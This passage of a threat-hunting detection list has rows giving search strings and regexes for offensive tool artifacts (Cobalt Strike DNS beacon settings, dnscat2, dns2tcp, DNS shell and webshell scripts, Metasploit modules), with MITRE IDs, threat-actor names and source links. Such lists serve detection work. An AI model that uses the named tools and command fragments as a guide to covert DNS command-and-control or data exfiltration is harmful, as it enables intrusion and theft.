T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41176" "*dns_beacon_ns_response*",".{0,1000}dns_beacon_ns_response.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41177" "*dns_beacon_put_metadata*",".{0,1000}dns_beacon_put_metadata.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41178" "*dns_beacon_put_output*",".{0,1000}dns_beacon_put_output.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41179" "*dns_bruteforce.rb*",".{0,1000}dns_bruteforce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41180" "*dns_redir.sh *",".{0,1000}dns_redir\.sh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","#linux","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","41181" "*dns_server.py -d *",".{0,1000}dns_server\.py\s\-d\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41182" "*dns_spoof.*",".{0,1000}dns_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41183" "*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy 
that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41184" "*'dns_stager_prepend'*",".{0,1000}\'dns_stager_prepend\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","41185" "*'dns_stager_subhost'*",".{0,1000}\'dns_stager_subhost\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","41186" "*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41187" "*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41188" "*dns2tcp-*.zip*",".{0,1000}dns2tcp\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41189" "*dns2tcp.exe*",".{0,1000}dns2tcp\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41190" "*dns2tcp.hsc.fr*",".{0,1000}dns2tcp\.hsc\.fr.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41191" "*dns2tcp.kali.org*",".{0,1000}dns2tcp\.kali\.org.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - 
T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41192" "*dns2tcp.pid*",".{0,1000}dns2tcp\.pid.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41193" "*dns2tcpc -z *",".{0,1000}dns2tcpc\s\-z\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41194" "*dns2tcpc.exe*",".{0,1000}dns2tcpc\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41195" "*dns2tcpd --*",".{0,1000}dns2tcpd\s\-\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41196" "*dns2tcpd -f *",".{0,1000}dns2tcpd\s\-f\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41197" "*dns2tcp-master*",".{0,1000}dns2tcp\-master.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for 
relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","41198" "*dnsadmin_serverlevelplugindll.*",".{0,1000}dnsadmin_serverlevelplugindll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41199" "*DNSAES256Handler.*",".{0,1000}DNSAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","41200" "*dns-beacon *",".{0,1000}dns\-beacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and 
Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41201" "*dns-black-cat-main*",".{0,1000}dns\-black\-cat\-main.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41202" "*DNS-C2 #>*",".{0,1000}DNS\-C2\s\#\>.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41203" "*dnscan-master*",".{0,1000}dnscan\-master.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","41204" "*dnscat -*",".{0,1000}dnscat\s\-.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41205" "*dnscat --dns *",".{0,1000}dnscat\s\-\-dns\s.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. 
which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","EMBER BEAR","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41206" "*dnscat tcpcat*",".{0,1000}dnscat\stcpcat.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41207" "*dnscat*",".{0,1000}dnscat.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","EMBER BEAR","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41208" "*dns-cat.exe -*",".{0,1000}dns\-cat\.exe\s\-.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41209" "*dnscat2*.tar.bz2*",".{0,1000}dnscat2.{0,1000}\.tar\.bz2.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER 
